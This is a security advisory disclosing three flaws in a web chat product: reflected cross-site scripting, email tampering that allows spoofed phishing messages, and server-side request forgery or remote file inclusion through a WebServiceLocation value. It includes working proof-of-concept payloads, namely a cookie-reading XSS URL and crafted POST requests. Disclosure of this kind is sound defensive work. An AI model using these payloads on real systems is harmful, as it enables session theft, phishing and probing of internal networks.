Product: Web Chat versions 6.1.300.31, 6.2.284.34 and possibly others
Researcher: Matt Landers – firstname.lastname@example.org
Issue 1: Cross Site Scripting (XSS)
versions 6.1.300.31, 6.2.284.34 and possibly others
Proof of Concept: Copy and paste the following payload in to your web browser, edit the request to insert the name of the domain you would like to test. http://example.com:8088/webChat/Main.aspx? QueueName=CHAT48809%22%3balert(document.cookie)%2f%2f572
Issue 2: Email tampering
A user of the web chat software is allowed to send an archive of their chat log to an email address specified at the beginning of the chat where the user enters in their name and email. This Post request can be modified to change the message as well as the end recipient of the message as seen below.
The email will have the same domain name and user as the web chat is allotted. This can be used in phishing campaigns against users on the same domain.
Proof of Concept: POST /WebChat/Chat.asmx/EmailTranscript HTTP/1.1 Host: redacted.com:8088 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT Content-Type: application/x-www-form-urlencoded Content-Length: 217 Connection: close Cookie: &ToEmailemail@example.com&Message=Click on this link for your refund! &WebServiceLocation=http://localhost:8088/WebService/
Issue 3: Server Side Request Forgery / Remote File Include
Version 6.1.300.31 is vulnerable to server side request forgery
In this instance, any post request we are able to replace the port number (8088) with a range of ports to determine what is visible on the internal network as opposed to what general web traffic would see on the web chat host.
The response from open ports is different than closed ports as shown in the following screen shot. The web chat software does not allow us to change protocol so anything besides http(s) will throw an error, however it is the type of error that we are seeing in the following screen shots that allows us to determine if a port is open or not.
Proof of Concept: POST /WebChat/General.asmx/DeleteDataPushFilter?UserSessionID= &filterName=WebChatTracker HTTP/1.1 Host: redacted.com:8088 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://redacted.com:8088/webChat/Main.aspx?QueueName=CHAT Content-Type: application/x-www-form-urlencoded Content-Length: 43 Connection: close Cookie: WebServiceLocation=http://localhost:8085/WebService/
Version 6.2.284.34 is vulnerable to remote file include
I have included this as part of Issue 3 as I believe they are related.
Specifically with this version of the web chat software we were able to replace the localhost attribute with our own domain name. When the web chat server calls our domain after the Post request is sent, it retrieves our data and displays it.
Also worth mentioning is the amount of information sent in the request from the web chat server, to ours, reveals information the public should not have. This includes path names and internal ip addresses. See the screen shot below for examples.